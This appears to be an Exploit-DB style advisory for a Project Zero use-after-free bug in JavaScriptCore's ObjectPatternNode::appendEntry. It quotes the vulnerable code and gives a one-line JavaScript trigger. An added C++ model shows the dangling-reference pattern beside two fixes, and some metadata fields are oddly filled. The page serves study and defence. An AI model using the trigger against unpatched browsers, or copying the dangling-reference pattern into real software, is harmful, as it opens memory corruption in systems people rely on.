Vendor: ObjectPatternNode::appendEntry
By: Project Zero
CVSS: 8.8 (HIGH)
CWE: 416 (Use-after-free)
Product Name: ObjectPatternNode::appendEntry
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

ObjectPatternNode::appendEntry Vulnerability

The Identifier object created by 'Identifier()' is a temporary on the stack and is destroyed once the appendEntry method finishes, while the appended Entry keeps a reference to it. Any later access through that reference is a use-after-free of stack memory.

Mitigation:

Ensure that no object is accessed after it has been freed: a stored reference must refer to an object that outlives the structure holding it, either by storing the value itself or by referencing a long-lived object.
Source

Exploit-DB raw data:

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1256

Here's a snippet of ObjectPatternNode::appendEntry.

void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
    // Identifier() is a temporary; Entry::propertyName is a const Identifier&,
    // so the appended Entry keeps a reference that dangles once this statement ends.
    m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}

Here's the definition of Entry.

struct Entry {
    const Identifier& propertyName;
    ExpressionNode* propertyExpression;
    bool wasString;
    DestructuringPatternNode* pattern;
    ExpressionNode* defaultValue;
    BindingType bindingType;
};

The Identifier object created by "Identifier()" is on the stack, so it will get freed at the end of the appendEntry method.

PoC:

var {[a]: b, ...[]} = {};
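The lifetime bug above is a general C++ pattern: an aggregate with a reference member is initialized from a temporary, then copied into a container that outlives the temporary. The following added example (written for this page, not WebKit's code) models it with a constructed Identifier stand-in that registers every live instance, so a stored reference can be checked for validity by address without dereferencing a dead object. It shows the vulnerable shape from the snippet next to both fixes: binding the reference to a long-lived identifier, or storing the Identifier by value. All names (RefEntry, OwningEntry, DanglingPattern, emptyIdentifier and so on) are assumptions for the demo.

```cpp
#include <cstdio>
#include <set>
#include <string>
#include <utility>
#include <vector>

// Stand-in for JSC's Identifier (constructed model, not WebKit's class). Each
// live instance registers its address so a stored reference can be validated
// without touching possibly-freed memory.
class Identifier {
public:
    explicit Identifier(std::string name = std::string()) : m_name(std::move(name)) { liveSet().insert(this); }
    Identifier(const Identifier& other) : m_name(other.m_name) { liveSet().insert(this); }
    ~Identifier() { liveSet().erase(this); }
    const std::string& name() const { return m_name; }
    static bool isLive(const Identifier* p) { return liveSet().count(p) != 0; }
private:
    static std::set<const Identifier*>& liveSet() {
        static std::set<const Identifier*> s;
        return s;
    }
    std::string m_name;
};

// Fix 1 helper: a long-lived empty identifier that a reference member can bind
// to safely (static storage, never destroyed while the program runs).
const Identifier& emptyIdentifier() {
    static const Identifier empty;
    return empty;
}

// Same shape as the Entry on the page: reference member plus plain fields.
struct RefEntry {
    const Identifier& propertyName;
    int propertyExpression; // stand-in for ExpressionNode*
};

// Fix 2 shape: the Entry owns its Identifier, so the two share a lifetime.
struct OwningEntry {
    Identifier propertyName;
    int propertyExpression;
};

// Vulnerable: Identifier() is a temporary destroyed at the end of the
// full-expression; the copy stored in the vector keeps a dangling reference.
class DanglingPattern {
public:
    void appendEntry(int expr) { m_targetPatterns.push_back(RefEntry{ Identifier(), expr }); }
    bool allReferencesLive() const {
        for (const RefEntry& e : m_targetPatterns)
            if (!Identifier::isLive(&e.propertyName)) // address check only, no dereference
                return false;
        return true;
    }
private:
    std::vector<RefEntry> m_targetPatterns;
};

// Fix 1: keep the reference member but bind it to an object that outlives the vector.
class LongLivedRefPattern {
public:
    void appendEntry(int expr) { m_targetPatterns.push_back(RefEntry{ emptyIdentifier(), expr }); }
    bool allReferencesLive() const {
        for (const RefEntry& e : m_targetPatterns)
            if (!Identifier::isLive(&e.propertyName))
                return false;
        return true;
    }
private:
    std::vector<RefEntry> m_targetPatterns;
};

// Fix 2: store the Identifier by value; the copy in the vector is the live one.
class OwningPattern {
public:
    void appendEntry(int expr) { m_targetPatterns.push_back(OwningEntry{ Identifier(), expr }); }
    bool allReferencesLive() const {
        for (const OwningEntry& e : m_targetPatterns)
            if (!Identifier::isLive(&e.propertyName))
                return false;
        return true;
    }
private:
    std::vector<OwningEntry> m_targetPatterns;
};

// Returns true when the vulnerable pattern leaves a dangling reference behind.
bool vulnerableEntryDangles() { DanglingPattern p; p.appendEntry(1); return !p.allReferencesLive(); }
bool longLivedFixHolds() { LongLivedRefPattern p; p.appendEntry(1); p.appendEntry(2); return p.allReferencesLive(); }
bool owningFixHolds() { OwningPattern p; p.appendEntry(1); p.appendEntry(2); return p.allReferencesLive(); }

int main() {
    std::printf("vulnerable entry dangles: %s\n", vulnerableEntryDangles() ? "yes" : "no");
    std::printf("long-lived reference fix holds: %s\n", longLivedFixHolds() ? "yes" : "no");
    std::printf("owning fix holds: %s\n", owningFixHolds() ? "yes" : "no");
    return 0;
}
```

The check deliberately compares addresses instead of reading the dead Identifier, because reading it is the use-after-free itself. In a real build the equivalent detection is AddressSanitizer with `ASAN_OPTIONS=detect_stack_use_after_return=1`, which reports the first read through such a reference as a stack-use-after-return.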